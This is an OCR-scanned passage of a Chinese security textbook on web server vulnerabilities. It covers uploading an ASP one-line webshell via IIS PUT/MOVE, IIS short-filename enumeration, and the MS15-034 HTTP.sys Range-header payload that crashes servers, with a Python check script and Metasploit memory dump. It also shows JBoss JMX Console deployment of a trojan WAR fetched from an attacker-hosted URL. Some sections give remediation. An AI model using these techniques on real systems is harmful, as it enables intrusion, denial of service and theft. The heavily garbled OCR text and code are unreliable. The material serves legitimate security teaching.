Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, 
SEARCH, MKCOL, LOCK, UNLOCK 

Cache-Control: private 
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11.2.4 漏洞 利用 方法 


1. 利用 PUT 协议 上 传 Webshell 
首先 利用 PUT 协议 上 传 Webshell。 注 意 ,不 能 直接 上 传 . asp 扩展 名 的 文件 ,需要 先 
上 传 内 容 为 二 %eval request("123") 5 Bi] txt 文件。 


服务 器 返回 201 Created, 说 明文 件 创 建成 功 。 


2. 修改 文件 扩展 名 
利用 move 方 法 将 文件 的 扩展 名 由 . txt 改 为 . asp: 


服务 器 返回 201 Created, 说 明 扩 展 名 修改 成 功 ,shell. asp 就 通过 IIS PUT 上 传 漏洞 
上 传 到 服务 器 的 根 目 录 下 ,获得 了 服务 器 的 Webshell, 
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Server: Microsoft-IIS/6.0 
MicrosoftOfficeWebServer: 5.0 Pub 
X-Powered-By: ASP.NET 

Location: http://www.ctfs-wiki.com/shell.asp 
Content-Type: text/xml 

Content-Length: 0 


113 IIS 短文 件 名 枚 举 漏洞 


11.3.1 IIS 短文 件 名 枚 举 漏洞 简介 


IIS 存在 短文 件 名 枚 举 漏 洞 ,该 漏洞 通过 在 GET 请 求 中 加 入 “一 ”, 可 以 让 远程 攻击 
者 看 到 diclose 文件 和 文件 夹 的 名 称 , 找 到 重要 的 文件 和 文件 夹 , 它 们 通常 不 是 可 见 的 。 
攻击 者 在 对 它们 进行 深入 分 析 后 可 以 威胁 用 户 的 安全 。 
IIS 短 文件 名 枚 举 漏洞 影响 TIS 的 以 下 版 本 : 
* IIS 1.0, Windows NT 3.51, 
* IIS 2.0, Windows NT 4.0, 
* IIS 3.0, Windows NT 4.0 Service Pack 2, 
* IIS 4.0, Windows NT 4.0 Option Pack, 
IIS 5.0, Windows 2000, 
* HS 5. 1, Windows XP Professional 和 Windows XP 媒体 中 心 版 (Media Center 
Edition) 。 
IIS 6. 0, Windows Server 2003 fill 64 位 Windows XP Professional, 
* IIS 7. 0, Windows Server 2008 fll Windows Vista, 
IIS 7.5, Windows 7 (远程 启用 错误 或 没有 Web. config 文件 ) 。 
* IIS 7.5，Windows 2008 (经 典 管道 模式 ) 。 
注意 : HS 使 用 . NET Framework 4 时 ,IIS 短文 件 名 枚 举 漏 洞 不 起 作用 。 


11.3.2 IIS 短文 件 名 枚 举 漏洞 分 析 与 利用 


1. Windows 长 文件 名 和 短文 件 名 

在 FAT16 文件 系统 中 ,由 于 文件 目录 表 中 的 文件 目录 登记 项 只 为 文件 名 保留 了 8B, 
为 扩展 名 保留 了 3B, 所 以 DOS 和 Windows 的 用 户 为 文件 起 名 字 时 要 受到 8. 3 格式 的 限 
制 。 但 是 ,从 Windows 95 开始 ,这 种 限制 被 打破 了 ,在 Windows 9x 中 可 以 使 用 长 文 
件 名 。 

当 创 建 一 个 长 文件 名 时 ,对 长 文件 名 目录 项 和 对 应 的 别名 (短文 件 名 ) 目 录 项 的 存储 
有 以 下 3 个 处 理 原则 : 

CD 取 长 文件 名 的 前 6 个 字符 加 上 一 1, 形 成 长 文件 名 的 别名 ,并 将 长 文件 名 中 最 后 
一 部 分 (最 后 一 个 间隔 符 “. ”后 面 的 字符 ) 的 前 3 个 字符 作为 其 扩展 名 。 
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(2) 如 果 通 过 第 (1) 条 原则 得 出 的 文件 名 已 存在 , 则 符号 一 后 的 数字 会 自动 增加 。 

(3) 任何 包括 小 写字 母 的 文件 名 都 被 看 作 长 文件 名 ,而 不 管 其 长 度 是 多 少 。 即 短 
文件 名 中 没有 小 写字 母 。 如 果 有 在 DOS 和 Windows 3. x 中 非法 的 字符 , 则 用 下 面 线 
BA. 

2. Apache 短文 件 名 

当 Apache 运行 在 Windows 下 时 ,如 果 创 建 了 一 个 长 文件 ,那么 无 须 猜 解 长 文件 名 ， 


直接 用 短文 件 就 可 以 下 载 。 
例如 ,在 Apache 网 站 根 目录 下 有 一 个 名 为 backup-082119f75623eb7abd7bf357698ff66c. 


sql 的 文件 ,如 图 11-2 Bron. 


Index of / 
» hackup-082119175623eb7abd7bf357698ff6&c sq 


图 11-2 Apache 网 站 根 目录 下 的 长 文件 名 文件 


可 以 利用 Windows 短文 件 名 的 特性 对 该 文件 进行 访问 ,输入 http: //www. ctfs- 
wiki. com/backup~1. sql, 可 以 直接 获取 该 文件 的 内 容 , 如 图 11-3 所 示 。 


(e)> cea [a http://www.ctfs-wiki.com/backup~1.SQL 
| 
DROP TABLE IF EXISTS ^xiao admin ; 
CREATE TABLE IF NOT EXISTS "xiao admin ( 
"userid' smallint (5) unsigned NOT NULL AUTO INCREMENT, 
"username" varchar(20) DEFAULT NULL, 
"password. varchar(32) DEFAULT NULL, 
^roleid' smallint(S) DEFAULT 'O', 
^realname' varchar (50) NOT NULL DEFAULT '', 
"auth text NOT NULL, 
^list size" smallint(5) NOT NULL, 
^left width! smallint(5) NOT NULL DEFAULT '150', 
PRIMARY KEY Cuserid ), 
KEY "username ( username ) 
) ENGINE=MyISAM DEFAULT CHARSET-utf8: 


INSERT INTO ^xiao admin ('userid', "username , "password , "roleid', "realname', "auth', "list size', "left width') VALUES 
(1, "admin name', 'admin pass', 1, 'HERJZSE SR, '', 10, 150); 


DROP TABLE IF EXISTS ^xiao block ; 
CREATE TABLE IF NOT EXISTS ^xiao block ( 
"id  smallint(8) unsigned NOT NULL AUTO INCREMENT, 
`type` tinyint(1) NOT NULL, 
“name” varchar(50) NOT NULL, 
content mediumtext NOT NULL, 
PRIMARY KEY Cid) 
) ENGINE-MyISAM DEFAULT CHARSET-utf8; 


11-3 利用 Windows 短文 件 名 的 特性 获取 文件 内 容 


11.3.3 IIS 短文 件 名 漏洞 利用 示例 


利用 通配符 * 和 ?发 送 一 个 请 求 到 IS。 不 同 版 本 的 IIS 接收 到 一 个 文件 路 径 中 包 
含 - 的 请 求 时 返回 的 HTTP 响应 结果 是 不 同 的 。 基 于 这 个 特点 ,可 以 根据 HTTP 的 响应 
确定 一 个 文件 是 否 可 用 。 不 同 HS 版 本 返回 的 信息 如 表 11-2 所 示 。 
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表 11-2 不 同 TIS 版 本 返回 的 信息 


IIS 版 本 URL 结果 /错误 信息 
TIS 6 /validx —1 * /. aspx HTTP 404-File not found 
IIS 6 /Invalid « —1 * /.aspx | HTTP 400-Bad Request 
IIS 5. x /valid « —1* HTTP 404-File not found 
IIS 5. x /Invalid « —1 * HTTP 400-Bad Request 
IIS 7. x. NET. 2( 无 出 错 处 理 ) | /valid« —1 * / 页 面 中 包含 "Error Code 0x00000000" 
IIS 7. x. NET. 2( 无 出 错 处理 ) | /Invalid + —1 * / 页 面 中 包含 "Error Code 0x80070002" 


1. 示例 环境 
以 IIS 6.0 为 例 , 网 站 根 目 录 存 在 backup698. txt 备份 文件 。 下 面 介 绍 如 何 利用 IIS 
短文 件 名 枚 举 漏洞 进行 文件 名 的 猜测 。 


2. 漏洞 利用 步骤 

漏洞 利用 步骤 如 下 : 

(1) 访问 http: //www. ctfs-wiki. com/a * —1 */.aspx, 返 回 400, 说 明 不 存在 一 个 
文件 名 开头 是 a 的 文件 ,如 图 11-4 所 示 。 


GET /a*-1*/.aspx HTTP/1.1 E | HTTF/1.1 400 Bad Request 
Host: www.ctfs-wilki.com Connection: close 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; Date: Wed, 28 Mar 2018 07:06:36 GMT 
rv:59.0) Gecko/20100101 Firefox/59.0 Server: Microsoft-IIS/6.0 

Accept: MicrosoftOfficeWebServer: 5.0 Pub 
text/html, application/xhtmléxml,application/xml;qc0.9,*/*;q X-Powered-By: ASP.NET 

-0.8 Content-Type: text/html 
Accept-Language: 

zh-CN, zh;q-0. B, zh-TW; q70. 7, zh-HK; q70. S, en-U8;q-0.3, en;q-0.2 4html»4body»Bad Requestc/body»4/hzml» 


Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Upgrade-Insecure-Requests: 1 


| 
图 11-4 IIS 返 回 400 说 明文 件 名 开头 不 是 a 


(2) 访问 http: //www. ctís-wiki. com/b * —1 * /. aspx.i& [t] 404, 说 明 存 在 一 个 文 
件 名 开头 是 b 的 文件 ,如 图 11-5 所 示 。 


[GET /b*-1*/.aspx HPTP/1.1 E | HIT2/1.1 4U4 Not Found 
Host: www.ctfu-wiki.com Content-Length: 1308 

User-Agent; Mozilla/5.0 (Windows N? 10.0; Win&4; x64; Content-Type: html 

rv:59.0) Cocko/20100201 Pirofox/59.0 Servor: Microsoft-I18/6.0 

Accept: MicrosoftofficeWebServer: 5.0 Pub 
|text/Rtnl, application/xhtml4xml, appLication/sml;q-D.9,*/*;q : ASP.NET 

-2.8 Date: Wed, 28 Mar 2018 07:10:42 GMT 


Accept- Language: 
zh-CN, zh;q=0. 8, zh-TW; q-0. 7, zh-EK;q70. 5, on-US;q-0.3, on;q-0.2 


Accept-Encoding: gzip, deflate 
Connection: keep-alive <META HTTP-EQU 
Upgrade-rnsecure-Requests: 1 charset-cB2312"» 

STYLE typo-"toxt/ceg"? 


图 11-5 TIS 返回 404 说 明文 件 名 开头 是 b 


(3) 访问 http: // www. ctfs-wiki. com/ba * 一 1*/.aspx' 返 回 404, 说 明 存 在 一 个 文 
件 名 开头 是 ba 的 文件 ,如 图 11-6 所 示 。 
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GET /ba*-1*/.aspx HTTE/1.1 HTTR/1.1 404 Not Found 
Host: www.ctfs-wiki.con| Content-Length: 1308 

User-Agent: Mozilla/5.D (windows N? 10.0; Win&4; x&&; Content-Type: text/html 

rv:88.0) Gecko/20100101 Firefox/55.0 18/6.0 

Accept: Microsoftofficewebserver: 5.0 Pub 
Iexc/htnl, application/xhtnlixnl,application/xml;q-0.9,*/*;q : ASP.NET 

0.8 8 Mar 2018 07:14:44 GMT 
Accept-Language: 

zh-CN, zh:q=0. B, zh-TW: q=0. 7, 2h-RK;q=0. 5, en-US;q-0. 3, en;q=0. 2 <!DOCTYPE HTML 


"http://www. 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Upgrade-Insecure-Requests: 1 


图 11-6 IS E|] 404 说 明文 件 名 开头 是 ba 


(4) 访问 http: //www. ctfs-wiki. com/baa * —1 * /. aspx.3& [i] 400, 说 明 不 存在 一 
个 文件 名 开头 是 baa 的 文件 ,如 图 11-7 所 示 。 


GET /baa*-1*/.aspx HTTP/1.1 HTTP/1.1 400 Bad Request 

lHost: www.ctfs-wiki.com| Connection: close 

User-Agent: Mozilla/S.0 (Windows NT 10.0; WinÉ4; x64; Date: Wed, 28 Mar 2018 07:17:03 GMT 
rv:59.0) Gecko/20100101 Firefox/59. 0 Server: Microsoft-I18/6.0 

Accept: MicrosoftOfficeWebServer: 5.0 Pub 
text/html, application/xhtml*xml,application/xml;q-0.9,*/*;q X-Powered-By: ASP.NET 

-0.8 Content-Type: text/html 
Accept-Language: 

zh-cN, zh;q=0. B, zh-TW;q=0. 7, zh-HK;q-0. 5, en-US;q-0. 3, en;q-0.2 <html><body>Bad Request</body></html> 


Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Upgrade-Insecure-Requests: 1 


图 11-7 IS 返回 400 说 明文 件 名 开头 不 是 baa 


(5) 访问 http: //www. ctfs-wiki. com/bac * ~1xy/.aspx, 返 回 404, 说 明 存 在 一 个 
文件 名 开头 是 bac 的 文件 ,如 图 11-8 所 示 。 


GET /bac*-1*/.aspx HTI?/1.1 


Host: www.ctfs-wiki.con 
User-agent: Mozilla/5.0 (Windows NT 10.0; win&é: x64; Type: text/html 

rv:86.0) Cecko/2D100101 Pirofox/59.0 Microsoft-1:8/6.0 

Accept: MicrosoftofficeWebserver: 5.9 Pub 
text/html, application/xhtmlixml,application/xml;q-0.9,*/*;q X-Powered-By: ASP.NET 

-0.8 Date: Wed, 28 Mar 7018 07:17:48 GMT 


Accept-Language: 
zh-CN, zh; q=0. B, zh-TW: q-0. 7, zh- HK :q-0. 5, en-U5:q-2. 3, en;q 


.2 <!DOCTYPE HTML PUBLIC "-//W3C//UTD HTML 4 01//EN" 
"i / www. 3. crg/TR/html 4/atrict.dtd"» 

><HEAD>cTITLE2DCDOCDc/YITLE> 

lontent-Type" Content-"text/html; 


Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Upgrade-:nsecure-Requests: 1 


<STYLE type="text/css"> 


11-8 IIS 返回 404 说 明文 件 名 开头 是 bac 


按 上 面 的 步骤 继续 下 去 ,可 发 现存 在 名 为 backup698. txt 的 文件 。 


3. 漏洞 利用 工具 

利用 https: //github. com/lijiejie/IIS shortname Scanner 工具 可 以 检测 IIS 短文 件 
名 漏洞 ,但 是 该 工具 只 能 检测 是 否 存在 IIS 短文 件 名 漏洞 ,并 不 能 自动 猜测 整个 文件 的 名 
称 , 如 图 11-9 所 示 。 


11.3.4 IIS 短文 件 名 枚 举 漏洞 修复 


1. 关闭 NTFS 对 8.3 文件 名 格式 的 支持 
NTFS 对 8. 3 文件 名 格式 的 支持 功能 默认 是 开启 的 ,对 于 大 多 数 用 户 来 说 无 须 开 启 


该 功能 。 
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图 11-9 IIS 短文 件 名 漏洞 检测 工具 的 效果 


修改 下 面 的 注册 列表 值 为 1 ,然后 重启 计算 机 (此 修改 只 能 禁止 NTFS 对 8. 3 文件 名 
格式 的 支持 ,无 法 移 除 已 经 存在 的 文件 的 短文 件 名 ) 。 


HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3Name 
Creation 


2. 禁用 ASP.NET 功能 
如 果 Web 环境 不 需要 ASP. NET 的 支持 ,可 以 进入 Internet 信息 服务 (IIS) 管 理 器 ， 
选择 “Web 服务 扩展 ”>ASP. NET 选项 ,禁用 此 功能 。 


3. 禁止 在 URL rh 4e Hj" —" & K Unicode 编码 
通过 分 析 短 文件 名 的 URL 格式 进行 黑 名 单 验证 ,只 要 是 与 黑 名 单 相 关 的 字符 都 


禁止 。 


11.4 IIS HTTP. sys 漏洞 


11.4.4. 漏洞 简介 


IIS HTTP. sys 的 漏洞 编号 是 “CVE-2015-1635,MS15-034,CNNVD-201703-1151”。 

HTTP. sys 是 一 个 运行 于 Windows 内 核 模 式 下 的 驱动 程序 ,能 够 让 任何 应 用 程序 通 
过 它 提供 的 接口 利用 HTTP 进行 通信 。 

由 于 HTTP. sys 会 错误 地 解析 某 些 特殊 构造 的 HTTP 请 求 ,因此 存在 远程 代码 执 
行 漏洞 。 远 程 攻 击 者 可 以 通过 IIS 7. 0( 或 更 高 版 本 ) 服 务 将 恶意 的 HTTP 请 求 传递 给 
HTTP. sys。 成 功利 用 此 漏洞 可 导致 HS 系统 蓝屏 ,执行 任意 代码 ,甚至 使 网 站 遭受 网 页 
被 算 改 、 黑 链 、 用 户 信 息 被 泄露 以 及 更 严重 的 攻击 风险 。 


11.4.2 影响 版 本 
IIS HTTP. sys 漏洞 影响 以 下 IIS 及 Windows 版 本 : 
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* HS7.0 及 以 上 版 本 。 

* Windows Server 2012 R2, 

* Windows Server 2012, 

* Windows Server 2008 R2 SP1, 
* Windows 8.1, 

* Windows 8, 

* Windows 7 SP1. 


11.4.3 漏洞 分 析 与 利用 


1. 利用 curl 工具 检测 漏洞 
命令 示例 如 下 : 


如 果 服 务 器 返回 Requested Range Not Satisfiable, 则 说 明 存在 IIS HTTP. sys 漏洞 。 


2. 利用 payload 检测 漏洞 
注意 ,用 下 面 的 payload 检测 会 导致 服务 器 蓝屏 。 
测试 POC 代码 如 下 : 


mum 254 um 
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»User- Agent: curl/7.21.1 (i386-pc- win32) libcurl/7.21.1 OpenSSL/1.0.2g 


zlib/1.2.5 

>Host: www.ctfs-wiki.com 

>Accept: */* 

>Range: bytes=18-18446744073709551615 


发 现 服务 器 出 现 蓝屏 现象 ,如 图 11-10 所 示 。 


g 


dump 


图 11-10 服务 器 出 现 蓝屏 现象 


3. 利用 Python 脚本 检测 漏洞 
测试 POC 代码 如 下 : 


import sys 
import socket 
import random 
ipAddr=sys.argv[1] 
hexAllFfff-"18446744073709551615" 
reql="GET / HTTP/1.0Nr Nn Men" 
req-"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes-0-"*hexAllFfff +"\r\n\r\n" 
print "[*] Audit Started" 
client socket-socket.socket(socket.AF INET, socket.SOCK STREAM) 
client socket.connect((ipAddr, 80)) 
client socket.send(reql) 
boringResp-client socket.recv (1024) 
if "Microsoft" not in boringResp: 
print "[* ] Not IIS" 
exit(0) 
client socket.close() 
client socket-socket.socket(socket.AF INET, socket.SOCK STREAM) 
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client socket.connect((ipAddr, 80)) 
client socket.send (req) 
goodResp-client socket.recv (1024) 
if "Requested Range Not Satisfiable" in goodResp: 
print "IIS is VULN!!!" 
elif " The request has an invalid header name" in goodResp: 
print "[*] Looks Patched" 
else: 
print "[* ] Unexpected response, cannot discern patch status" 


Python 脚本 执行 示例 如 下 : 


python CVE-2017-7269.py ip 


如 果 返 回 “[ x* ] Audit Started IIS is VULN111”, 说 明 存 在 IIS HTTP. sys 漏洞 。 


4. 利用 Metasploit 检测 漏洞 
利用 Metasploit 检测 IIS HTTP. sys 漏洞 的 步骤 如 下 : 
(1) 进入 Kali Linux 系统 ,输入 msfconsole, 进 入 控制 台 , 如 图 11-11 所 示 。 


rootgkali:-$ msfconsole 


图 11-11 进入 控制 台 


(2) 查找 与 MS15-034 相关 的 poyload。 输 入 search MS15-034, 发 现 有 两 个 


payload ,一 个 的 功能 是 造成 拒绝 服务 攻击 , 另 一 个 的 功能 是 读 取 内 存 , 如 图 11-12 所 示 。 


t built yet. using 


图 11-12 search MS15-034 结果 


(3) 用 读 取 内 存 的 payload 进行 测试 。 输 入 use auxiliary/scanner/http/msl5 034 


http_sys_memory_dump ,使 用 内 存 读 取 模块 ,如 图 11-13 所 示 。 
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图 11-13 使 用 内 存 读 取 模 块 


(4) 设置 参数 。 输入 set RHOSTS www. ctfs-wiki. com, 设 置 目标 服务 器 为 www. 
ctfs-wiki. com, 如 图 11-14 所 示 。 
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图 11-14 设置 目标 服务 器 为 www. ctfs-wiki. com 


C5) 使 用 run 命令 开始 攻击 ,获取 了 内 存 信息 。 


msf auxiliary (ms15 034 http sys memory dump) »run 


[*] Target may be vulnerable... 
[+] Stand by... 


[-] Memory dump start position not found, dumping all data instead 


[+] Memory contents: 

54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 
3a 20 62 79 74 65 73 0d 0a 45 54 61 67 3a 20 22 
30 36 33 38 38 37 30 36 38 63 63 63 37 31 3a 30 
22 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 
73 6f 66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 
50 6f 77 65 72 65 64 2d 42 79 3a 20 41 53 50 2e 
4e 45 54 Od 0a 44 61 74 65 3a 20 53 75 6e 2c 20 
30 31 20 41 70 72 20 32 30 31 38 20 30 39 3a 31 
39 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 
74 2d 4c 65 6e 67 74 68 3a 20 36 35 32 31 34 0d 
0a 0d 0a 2d 2d 3c 71 31 77 32 65 33 72 34 74 35 
79 36 75 37 69 38 6£ 39 70 30 7a 61 78 73 63 64 


IT..Accept-Ranges | 
|: bytes. ETag: " | 
1063887068ccc71:0 | 
|"..Server: Micro | 
[so#t-T£S/T,5. x= | 
IPowered-By: ASP. | 
INET. .Date: Sun, I 
101 Apr 2018 09:1 | 
19:26 GMT..Conten | 
|t-Length: 65214. | 
|--.-7-«qlw2e3r4t5 | 
1y6u7i809p0zaxscd | 
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11.4.4 漏洞 修复 


通过 修改 Windows HTTP 堆栈 处 理 请 求 的 方式 可 以 修复 IIS HTTP. sys 漏洞 。 
HTTP. sys 漏洞 修复 补丁 下 载 地 址 如 下 : 

https://support. microsoft. com/zh-cn/kb/3042553 

注意 : 在 打 完 微软 公司 提供 的 补丁 后 ,必须 重启 系统 ,修复 才 会 生效 。 

如 果 系 统 暂 时 无 法 升级 补丁 ,那么 可 通过 禁用 TIS 内 核 缓存 临时 缓解 此 漏洞 的 危险 ， 
但 需要 注意 ,这 可 能 会 导致 IIS 性 能 下 降 。 具 体 的 执行 方法 可 以 参考 以 下 文档 : 

https://technet. microsoft. com/zh-cn/library/cc731903(v= ws. 10). aspx 


5 JBoss 服务 器 漏洞 


JBoss 是 一 个 基于 J2EE 的 开放 源 代 码 的 应 用 服务 器 。JBoss 
代码 遵循 GNU Bj LGPL(Lesser General Public License, 宽 通用 公 
共 许 可 ) ,可 以 在 任何 商业 应 用 中 免费 使 用 。JBoss 是 一 个 管理 
EJB 的 容器 和 服务 器 ,支持 EJB 1. 1,EJB 2. 0 和 EJB 3. 0 的 规范 。 


e° ° 
@ 
° JBoss 
@ @ by Red Hat 
图 11-15 JBoss 标识 
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JBoss 标识 如 图 11-15 所 示 。 


11.5.1 JBoss 的 重要 目录 文件 


JBoss 包括 以 下 目录 : 
CD bin: 存放 Windows 和 UNIX 环境 下 的 启动 脚本 和 启动 配置 文件 。 其 中 有 两 个 


主要 的 批 处 理 文件 
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run. sh 和 shutdown. sh ,分 别 用 于 关闭 和 启动 JBoss. 


(2) client: 存放 Java 客户 端 应 用 或 外 部 Web 容器 (在 JBoss 之 外 运行 ) 所 需 的 配置 
文件 和 jar 文件 。 

(3) lib: 存放 JBoss 所 需 的 JAR 文件 。 不 要 把 用 户 自 己 的 JAR 文 件 放 在 这 个 目录 中 。 
(4) docs: 存放 JBoss 的 XML DTD 文件 以 及 案例 和 文档 。 

(5) server: 存放 JBoss 服务 器 实例 的 配置 集合 。 该 目录 的 每 个 子 目 录 就 是 一 个 服务 
器 实例 配置 。 该 目录 包括 all minimal 和 default FAR. 

default 子 目录 又 包括 以 下 子 目录 : 


. 


. 


conf: 存放 服务 器 的 启动 描述 文件 jboss-service. xml。 这 个 文件 定义 了 服务 器 运 
行 时 提供 的 固定 的 核心 服务 。 

data; 存放 服务 中 需要 存储 到 文件 系统 的 内 容 。JBoss PIER Hypersonic 数据 库 
的 数据 也 存放 在 这 里 。 

deploy: 存放 可 热 部 署 的 服务 (可 以 在 服务 器 运行 时 动态 添加 和 删除 ) 。 该 子 目录 
还 存放 服务 器 实例 下 的 应 用 程序 。 用 户 可 以 将 自己 的 应 用 程序 代码 的 压缩 包 
GAR,WAR fil EAR 文件 ) 发 布 到 这 里 。 该 目录 会 被 搜索 并 更 新 ,所 有 修改 后 的 
组 件 都 会 被 自动 重新 部 署 。 

lib; 存放 服务 器 配置 需要 的 JAR 文件 (这 些 Java 库 不 需要 热 部 署 )。 用 户 可 以 将 
需要 的 库 文件 (如 JDBC 驱动 程序 等 ) 添 加 到 该 子 目 录 中 。 所 有 的 JAR 文件 在 服 
务 器 启动 时 被 加 载 到 共享 的 classpath 中 。 

log: 存放 日 志文 件 。 如 果 要 修改 日 志 输 出 目录 ,可 以 通过 配置 conf/log4j. xml 
实现 。 

tmp: 提供 给 JBoss 服务 的 临时 存储 空间 。 

work: 供 Tomcat 编译 JSP 文件 时 使 用 。 


11.5.2 JBoss 未 授权 访问 部 署 木马 


JBoss 可 以 通过 多 种 方式 部 署 Web 应 用 程序 ,常见 的 部 署 Web 应 用 的 方式 包括 
JBossWeb Console,J MX Console, JMXInvokerServlet 等 接口 。 如 果 存 在 接口 未 授权 访 
问 或 者 弱 口 令 等 漏洞 ,攻击 者 就 可 以 通过 弱 口 令 进 入 后 台 ,通过 部 署 WAR 包 的 功能 ,上 
传 木 马 ,获得 shell 权限 。 

JMX 是 Java 1. 5 中 引入 的 新 特性 。JMX 全 称 为 Java Management Extension, ËJ] 
Java 管理 扩展 ,常用 于 管理 线程 内存. 日 志 Level、 服 务 重启 .系统 环境 等 。 

JMX Console 是 JBoss JMX 的 管理 程序 ,可 以 通过 JMX Console 方便 地 对 JBoss 进 
行 管理 。 其 中 jboss. deployment 是 用 来 进行 应 用 部 署 的 接口 ,可 以 通过 jboss. 
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deployment 接口 的 addURL 方法 部 署 Web 应 用 程序 。 


1. JBoss 默认 页 面 
访问 JBoss 网 站 ,发 现存 在 JBoss 默认 页 面 , 如 图 11-16 所 示 。 


Boss Online Resources 


* JBoss AS Documentation 


Boss Management 
* Tomcat status (full) (XML) 
* JM insoli 


nsol 


图 11-16 JBoss 默认 页 面 


2. JMX Console 控制 台 
尝试 通过 JMX Console 进行 Webshell 木马 应 用 部 署 。 单 击 JMX Console 链接 发 现 
存在 未 授权 访问 ,可 以 直接 进入 JBoss 的 JMX 管理 界面 ,如 图 11-17 所 示 o 


~ 
@ Lond URL [www.ctfs-wiki.com:8080/jmx-console/ 
Ë spun. 
© Execute 
C Enable Post data [ ] Enable Referrer 


°. z 
e ° JMX Agent View 
e test-b9edf20207 (127.0.0.1) - default 
d 
ObjectName Filter (e.g. "jboss:**, "*:service-invoker,*") :| | ApplyFilter | 
Catalina 
* type=server 
* type-StringCache 


JMImplementation 


E 
* type-MBeanRegistry 
* typezMBeanServerDelegate 


com.arjuna.ats.properties 


* modulecarjuna 
* module-jta 
* module-txoj 
jboss 
* database-localDB,se! ez! rsonic 
* name-Proj ditorManager, Service 
* name-SystemP! rties, Service 
| 。readonlv=true .service=invokertarqet=Namind ,type=http 


11-17 JMX 管理 界面 
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3. jboss.deployment 接口 
通过 jboss. deployment 接口 部 署 Web 应 用 。 单 击 jboss. deployment 链接 进入 应 用 
部 署 页 面 ,如 图 11-18 所 示 。 


jboss.cache 

* service=InvalidationManager 
jboss.console 

* sarzconsole-mgr.sar 
jboss.deployer 

* servicezBSHDeployer 


jboss.deployment 


* flavorzURL.typezDeploymentScanner 
jboss.ejb 


jboss.ejb3 


* service-EJB3Deployer 
* service-JarsignoredForScanning 


jboss.j2ee 


图 11-18 jboss. deployment 接口 


4. 搭建 Web 服务 器 

在 jboss. deployment 接口 中 添加 的 参数 必须 是 URL 格式 ,需要 通过 Apache IS 等 
搭建 Web 服务 器 ,将 木马 的 WAR 包 程 序 放 到 部 署 好 的 网 站 上 ,然后 通过 addURL 方法 
访问 http://x. x. x. x/test. war, 下载 test. war 并 部 署 到 JBoss E. 

利用 Apache 中 间 件 搭建 Web 服务 器 ,将 test. war 放 到 Web 服务 器 上 ,如 图 11-19 
所 示 。 


Index of / 


* testwar 


11-19 搭建 Web 服务 器 放置 test. war 


5. 部 署 木马 
通过 addURL 方法 进行 木马 的 远程 部 署 。 在 参数 中 添加 http://x. x. x. x/test. war, 
然后 单 击 Invoke 按钮 进行 部 署 , 如 图 11-20 所 示 。 


6. 部 署 成 功 
单 击 Invoke 按钮 后 ,访问 发 现 木马 已 经 成 功 部 署 , 如 图 11-21 所 示 。 虽 然 HTTP 状 
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MBean Operation. 


m java.net.uRL | |oo description) 


void addURL() 


MBean Operation. 


[p1 ljava.net.URI [np:/pxxwtestwar | (no description) 


Invoke 


void addURL() 
MBean Operation. 
[pi java.lang.String C J] [mo description) 


Jnvoke 


图 11-20 通过 addURL 方法 添加 远程 木马 


态 码 为 500, 但 是 仍然 可 以 通过 “中 国 菜刀 ”一 句 话 木马 连接 工具 正常 连接 ,如 图 11-22 
所 示 。 


HTTP Status 500 


[STI Exception report 

[message] 

EET The server encountered an internal error () that prevented it from fulfilling this request. 
exceptioni 


org. apache. jasper.JasperException: java. io. UnsupportedEncodingException: null 
org. apache. jasper. servlet. J spServ]etWrapper. handle] spException(JspServletWrapper. java: 521 
org. apache. jasper. servlet. JspServletWrapper. service (J spServletWrapper. java: 403) 
org. apache. jasper. servlet. J spServlet. service] spFile (JspServlet. java: 336) 
org. apache. jasper. servlet. JspServlet. service(JspServlet. java: 265) 
javax. servlet. http. HttpServlet. service(HttpServlet. java: 803) 
org. jboss. web. tancat. filters. ReplyHeaderFilter. doFi ter (ReplyHeaderFilter. java: 96) 


[root cause] 


java. io.UnsupportedEncodingException: null 
java. lang. StringCoding. decode (StringCoding. java: 190) 
java. lang. String. Gnit) (String. java: 416) 
java lang. String. Cinit> (String. java: 491) 
org. apache. catalina. connector. Request. set Char acterEncoding (Request. java: 1478) 
org. apache. catalina. connector. RequestFacade. setChar acterEncoding (RequestFacade. java: 307) 
org. apache. jsp. jspsmall jsp. jspService (jspsmall jsp. java: 104) 
org. apache. jasper. runtime.Http] spBase. service (Http] spBase. java: 70) 
javax. serviet. http. HttpServlet. service(HttpServlet. java: 803) 
org. apache. jasper. servlet. J spServletWrapper. service (J spServletWrapper. java: 373) 
org. apache. jasper. servlet. JspServlet. service] spFile (JspServlet. java: 336) 
org. apache. jasper. servlet. JspServlet. service(JspServlet. java: 265) 
java. serviet. http. HttpServlet. service(HttpServlet. java: 803) 
org. jboss. web. tomcat. filters. ReplyHeaderFilter. doFilter (ReplyHeaderFilter. java: 96) 


HE The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs. 


图 11-21 访问 发 现 木 马 成 功 部 署 的 效果 
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server default, \deploy\nanagenent\ v| wm | 


108 目录 (8), 文 件 (0) 名 称 时 间 大 小 属性 
局 awa 20150810100632 0 RW 

E abwar 20150810100346 0 RW 

bss E abewar 2050810092045 — 0 RW 
server E abedwar 20050810094722 — 0 RW 
© 4etaalt © boda war 20150810095014 — 0 RW 
Ba. © abcdel.war 2015081009542 — 0 Rw 
C2 sbcws 20150810094536 — 0 RW 

E consolemg.sar 20150809173845 — 0 RW 


图 11-22 木马 通过 “中 国 菜刀 ”工具 正常 连接 


11.5.3 JBoss Invoker 接口 未 授权 访问 远程 命令 执行 


JMX Invoker 允许 客户 端 应 用 程序 发 送 任意 协议 的 JMX 请 求 到 服务 端 。JMX 
Invoker 默认 对 外 开放 接口 。 攻 击 者 可 以 构造 一 个 恶意 的 Java 序列 化 
MarshalledInvocation 对 象 ,然后 远程 调用 MarshalledInvocation 可 在 服务 器 中 执行 任意 
代码 。 

